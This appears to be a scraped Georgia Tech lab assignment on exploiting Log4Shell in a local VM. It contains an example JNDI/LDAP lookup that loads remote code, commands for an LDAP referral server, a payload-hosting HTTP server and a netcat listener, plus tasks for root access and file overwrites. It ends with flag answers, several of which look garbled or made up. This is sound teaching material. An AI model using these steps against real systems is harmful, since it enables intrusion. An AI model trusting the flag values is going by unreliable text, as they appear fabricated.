[SOLVED] CS6035 Log 4 Shell Solved

Welcome!For this assignment you will exploit a real world vulnerability: Log4Shell.This will be a capture-the-flag style project where you will exploit a web application with a vulnerable version of log4j.A correct solution will output a flag or key. There are six tasks to complete for six total flags. You will submit these flags in json format to Gradescope for grading in a file namedproject-log4shell.json.There is a template in the home folder of the VM forproject-log4shell.json. Copy this file and fill out the appropriate values for the flags found. Submit this file to Gradescope for immediate feedback with the autograder. Your grade will be reflected here in Canvas after the assignment has closed.The vm link ishttps://cs6035.s3.amazonaws.com/CS6035-Spring2024-rc3.ovaLinks to an external site.Links to an external site.Download the VM early in case you run into slow downloads.The VM username and password islog4jandMount-EverestGo here for project details on the course Github Pages site:https://github.gatech.edu/pages/cs6035-tools/cs6035-tools.github.io/Projects/Log4Shell/Good luck and have fun!Necessary Disclaimer:
THIS IS A REAL WORLD CRITICAL VULNERABILITY THAT MOST VENDORS HAVE PATCHED BUT THERE STILL COULD BE APPLICATIONS WITHOUT THE PATCH. THIS PROJECT IS FOR EDUCATIONAL PURPOSES ONLY. ATTEMPTING THIS ON REAL APPLICATIONS COULD PUT YOU IN VIOLATION OF THE LAW AND GEORGIA TECH IS NOT RESPONSIBLE.[NIST CVE Overview] [Randori: What is Log4Shell]Log4J is a very popular open-source framework that allows application developers to log important messages such as program flow, program state, exceptions, etc. These messages can include user input, dynamic data, database results, etc.Java Naming and Directory Interface (JNDI) creates a way for Java Objects to be looked up at runtime. There are many directory interfaces that provide different ways to lookup files. A common example is a database connection pool so that applications deployed on a server can get the connections they need by only needing to know the JNDI name instead of having to have the connection details. You can use Java Serialization to store the byte array representation of an object to store objects in a directory/naming service. JNDI uses Naming References if the object is too large such as ldap://server/locationWhere this comes into play in this exploit, is the Lightweight Directory Access Protocol (LDAP) which is not specific to Java. LDAP provides the communication language that is required to receive and send information from directory services. It can be used for authentication like sending usernames/passwords or retrieving object data through a url from another server.To tie this into Log4J, Log4J performslookupswhich allow forstring substitutionof certain strings. These are in the form of${prefix:name}i.e. a common one would be${java:runtime}and running this would produce Running Java version 1.8.0_20. Here is where the JNDI and LDAP come into play.${jndi:<lookup>}is a valid lookup expression recognized by the lookup by Log4J.A malicious user could specify a valid lookup protocol such as LDAP, RMI, or DNS in the JNDI lookup and direct the Log4J lookup to their malicious server/file. An example could be${jndi:ldap://cs6035.com/exploitfile}which would load data from that domain if a connection can be established. Attackers can even get environment variables if RCE is disabled and learn about the server/server environment. Often, HTTP requests log header information, query parameters, path parameters, and more which allow a vector for this attack to take place. With this background, now we are ready to start this lab.Here is a visual of the Log4j exploit and how it is accomplished (you can zoom in if this is too small via ctrl + scroll):SetupTo get setup for the flags, follow the steps carefully below, and be sure you are running each in a separate terminal window as noted.You will need switch users to login to log4j user via:Credentials can be found in Canvas on the Log4Shell Assignment pageIn the home directory of log4j user, start the container with the start script:./StartContainer.shOpen a new terminal window and go to Desktop/log4shell/logs:cd Desktop/log4shell/logsRun the following command to view the logs:tail -f cs6035.logOR to view System.out.println messages:tail -f console.logYou should now see the tail of the log file from the application running.Open a new terminal window and run the following command to set the current directory to Desktop/log4shell/target:cd ~Desktop/log4shell/targetNext, start the LDAP server by running:java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:4242/#ExploitYou can get the ip address of the vm by running the block below in a terminalip addr showThis outputs the vms IP127.0.0.1It is very important that this matches the port specified in the Malicious server. If your exploit is not working because it is not connecting to the malicious server, your ports likely do not match OR the vms IP is not correct.Open a new terminal and make sure the active directory is the directory that contains your malicious .class file. For simplicity, we have created Desktop/log4shell/{flag_no} for you to work in.Do not leave this directory. Run the server in Desktop/log4shell/{flag_no} by the following command:python3 -m http.server 4242It is very important that this matches the port specified in the LDAP server. If your exploit is not working because it is not connecting to the malicious server, your ports likely do not match OR the vms IP is not correctYou should see the following output:Open a terminal and run:nc -nlvp <your_desired_port>You should see the following output:To print debug statements from your Java code, tail the ~/Desktop/log4shell/logs/console.log file and add System.out.println statements to your Exploit.java.Intro FlagNow that we are set up, lets do a quick rundown of Log4j, how it works at a high level, and test that we are able to successfully call and exploit the application.As you should know from the background and resources section, Log4j is an application logging library that outputs user defined program information. An example log statement would look like the following:static Logger log = LogManager.getLogger(RestServlet.class.getName());log.debug(ApplicationId: {}, applicationId);The log statement above as you can see, defines the class, log level of the message and the actual message. Notice that we are injecting user input into the log message. This is where our vulnerability is.To be more specific, here is what the output of the message actually will look like:Now we can map the code to the logged message. The date/time is defined in configuration files which are out of the scope of this project. Next is where our code starts to map. We have [Classname.java:LineNumber]. This is helpful to know exactly what part of your code is executing and where.Next, we see DEBUG. This is what is called the log level. Log levels are used for the amount of output you want your application to log, or even to classify errors different from informative messages. The typical log levels are DEBUG, INFO, WARN, ERROR, FATAL. To further explain, if a log level is set to say ERROR, your application will not log anything on WARN, INFO, or DEBUG level. This application is set to DEBUG.Finally, we get to the actual logged message. As you can see, we log the constant text as well as the injected variable applicationId, which is our applicationId. This is the most important part you will want to pay attention to. Throughout this project, you will try to find messages that log user defined input and inject your malicious string into it.Now, lets have some fun and get familiar with the application. To do so, we will call the application normally and then lookup the java version on the application server.To start we can run a simple inquiry to the services /ping endpoint and see what we get back from the logs and see if we can find anything that is exploitable.GATECH_ID IS A REQUIRED HEADERNOTE: This is not the Georgia Tech Username, it is the gtId that you can find on your Buzzcard or here:GTID Lookup.Open a new terminal and run:curl http://localhost:8080/rest/users/ping -H GATECH_ID:123456789You should see your logs log some messages in the log tailing terminal window. Lets inspect it.Go back to the terminal window you are tailing the logs in. When the server intercepts a request, it logs Request intercepted to alert the user where the request starts. As we can see, there is not much going on in terms of useful information, but we can see the service did log a message that could be exploitable.Voila! In the highlighted message, we see that it is logging the Method Type: GET, the URL: /rest/users/ping, and some headers that are null. This is a good indicator that we can exploit this service by sending lookups through a header.Lets call one more endpoint to see how headers work and what the application does when we request user data.In your curl terminal, run the following command:curl http://localhost:8080/rest/users/userlist -H GATECH_ID:123456789 -H Accept:application/json -H X-UserName:rcoleman8Your output should be similar to:Take some time to inspect the logged messages and try to understand what the program is doing and the flow of it.Lets try to get the java version on the server now.The checked headers for this application are content-type, accept, and X-UserName.Construct a malicious payload using one of the logged headers that will return the java version of the host of the web application. You should see something like the screenshot below if successful:Do you see the same output? LIGHTWEIGHT BABY! Muahaha! If not, try to research the log4shell exploit more and learn how to exploit the lookup.Our hunch was correct and we have successfully exploited the vulnerability. You can play around with this if you like and see what other lookups you can perform. It is possible to lookup system settings, environment variables and much more just with this.Be sure to save your work outside of the VM in case the VM crashes or some other unforeseen issue arises. This will ensure you are not losing your work.Flag 1: Environment Echo (10 pts)Make sure you have gone through theSetupandIntrosections.If you havent already, run the start script in the home directory of log4j user, start the container with the start script:./StartContainer.shThe endpoint for this exploit can be called and inspected via:curl http://localhost:8080/rest/users/ping -H GATECH_ID:123456789 -H Accept:application/jsonNow that you have seen how to check environment variables, run a lookup for ADMIN_PASSWORD which stores your flag for this exercise. If successful, you should see the below output:Add this flag (Congratulations! Your flag1 is:____) to your project_log4shell.json file.NOTE: You do not need to use Java code, ldap, python server, etc to get this flag.Make sure you have gone through theSetupandIntrosections.If you havent already, run the start script in the home directory of log4j user, start the container with the start script:./StartContainer.shThe endpoint for this exploit can be called and inspected via:curl http://localhost:8080/rest/users/ping -H GATECH_ID:123456789 -H Accept:application/jsonNow that we have proven this service is vulnerable and that we can exploit it in at least one place, lets try to do more damage and do something more malicious. If you have not already, you NEED to read through the suggested readings and learn how/why it is possible to send jndi lookups.Open the Exploit.java file and construct a malicious payload to execute such that when the jndi/ldap lookup happens, it gives you root access on the vulnerable application server.You should have a total of 4 terminal windows open which are the 3 from the SETUP section and one terminal window to run your curl command.Once you are ready to run the exploit, ensure that the java version you are running the command is java version 1.8.0_20 by running:java -versionMake sure you have gone through theSetupandIntrosections.If you havent already, run the start script in the home directory of log4j user, start the container with the start script:./StartContainer.shNow that you have gotten familiar with this environment and exploit, lets try for another, more involved flag. We will try exploiting another URI:http://localhost:8080/rest/users/userlistThis endpoint will deliver a list of valid users a program can choose from. It uses a very weak form of authentication that verifies a user is permitted by validating their user id that they send through the X-UserName header field.The goal here is to use your gatech id number in the X-UserName header (in addition to the GATECH_ID header) and have the application validate successfully. Example:-H X-UserName:123456789First Run:curl http://localhost:8080/rest/users/userlist -H GATECH_ID:123456789 -H Accept:application/json -H X-UserName:rcoleman8and inspect the logged output. See if you can find anything that gives you a hint about how to exploit it/what you need to do to bypass the authentication.Update Exploit.java to send a malicious payload that will bypass the endpoints validation by sending your gatech id in the X-Username header. How you will bypass authentication can be found by analyzing the applications logged output. Follow the steps in the SETUP/INTRO section to run your exploit.Upon success, you will see the output below, where the blacked out AuthorizedUsers is your UserId and your flag is right below it..Make sure you have gone through theSetupandIntrosections.If you havent already, run the start script in the home directory of log4j user, start the container with the start script:./StartContainer.shYou have caught wind that this service caches database authorized users data in a file on the file system. Other applications use this service to get users data to cache and allow anyone who is an authorized user to access them. You understand how terrible of an idea this is and realize you are going to make them pay for dumb ideas.For this flag, you are going to bypass authentication (run Flag 3 again) and then UPDATE theUsersList.txton the server to add your GaTech student Id to replace one of the users names. Do not delete any of the users as the service checks to make sure that they are all there and you do not want to get caught. You should also keep the users id you overwrite intact. For example, if you decide you want to overwrite user(1,Tim Cook,CEO), it should be updated to
user(1,your_gatech_id,CEO).If you havent already, run the start script in the home directory of log4j user, start the container with the start script:sudo ./startContainer.shRun:curl http://localhost:8080/rest/users/user/?userId=1 -H GATECH_ID:123456789 -H X-UserName:rcoleman8and inspect the logged output. See if you can find anything that gives you a hint about how to exploit it/what you need to do to bypass the authentication.If successful, your flag will be stored in the response value objects name like the screenshot below:Make sure you have gone through theSetupandIntrosections.If you havent already, run the start script in the home directory of log4j user, start the container with the start script:./StartContainer.shThe endpoint for this exploit can be called and inspected via:curl http://localhost:8080/rest/users/user/updateuser -H GATECH_ID:123456789 -H Content-Type:application/json -H X-UserName:rcoleman8 data-raw {id: 1,name: User Name,profession: User Profession}FLAG 6: PubSub Override (20 pts)Make sure you have gone through theSetupandIntrosections.If you havent already, run the start script in the home directory of log4j user, start the container with the start script:./StartContainer.shFor this flag, we will exploit a previous endpoint that publishes updates to a topic on the server.curl http://localhost:8080/rest/users/user/updateuser -H GATECH_ID:123456789 -H Content-Type:application/json -H X-UserName:rcoleman8 data-raw {id: 1,name: User Name,profession: User Profession}You have caught wind that the service reads from a properties file.For this exploit, you will use the log4j exploit to overwrite the config.properties file saved in the root directory of the application. This properties file contains a topic that the application will publish a message to when updateUser call is made (the application is also subscribed to this topic as you can see in the logs).You will need to trick the application into publishing a message to a different topic with your GATECH_ID as the account number in order to generate a valid flag.Upon success, you should see your output similar to that below:This project needs to be submitted via Gradescope. Navigate to the course in Canvas, click Gradescope, click Project Log4Shell and submit there.This is an autograded project. You will have unlimited submissions with instant feedback. Your Gradescope grade will be your final grade. Be aware that your most recent submission is activated by default and will be used for your grade unless you activate another submission before the deadline.The contents of the submission file should be the following. There is a~/project_log4shell.jsonfile in your vm with a template set up, or you can copy-paste this to your newly createdproject_log4shell.jsonfile elsewhere and replace the placeholders with the flags you retrieve from each relevant task.Note: You can use TextEdit or Vim to create and edit this file. Do not use LibreOffice or any Word Document editor. It must be in proper JSON format with no special characters in order to pass the autograder and these Word Document editors are likely to introduce special characters.JSON Submission Template:{flag1: 4ec60c3e084d8387f0f33916e9b08b99d5264a486c29130dd4a5a530b958c5c0f1faeaca2ce30b478281ec546a4729f629b531a86cb27d86c089f0c542,flag2: f496d9514c01e8019cd2bc21edfeb8e33f4a29af14a8bf92f7b3c14b5e06c5c0f1faeaca2ce30b478281ec546a4729f629b531a86cb27d86c089f0c442,flag3: b621bba0bb535f2f7a222bd32994d3875bcfcad651160c543de0a01dbe2e0c5c0f1faeaca2ce30b478281ec546a4729f629b531a86cb27d86cf0c49542,flag4: b34235hjghg34g23g4uy23g4yg12h1j2g4f12hj4gj1h2g4g12h4g12h4ghj12g4jh1g24khj1g24jhg1k4gh1h24g1j24h1g24hjg124hg12k4hg1hj4gj1h2,flag5: 6kj2348932ur98wef89yawfsf89asdyf87adtsguihasidogy87dsghiausdyg87adshgo87dshg9ueg90ojawoeigj9we8ye8t9yqwethijkfdjfa98y89eje,flag6: 5g87a8d9sg7a0sd98g79asd87g890as7dg8sadg7ads908gydsiayhgkjtj4tk535j3lk4523j23j4c698ddd5f6a5df67b6xc6vzx786vzx5cv87v8z69xv76}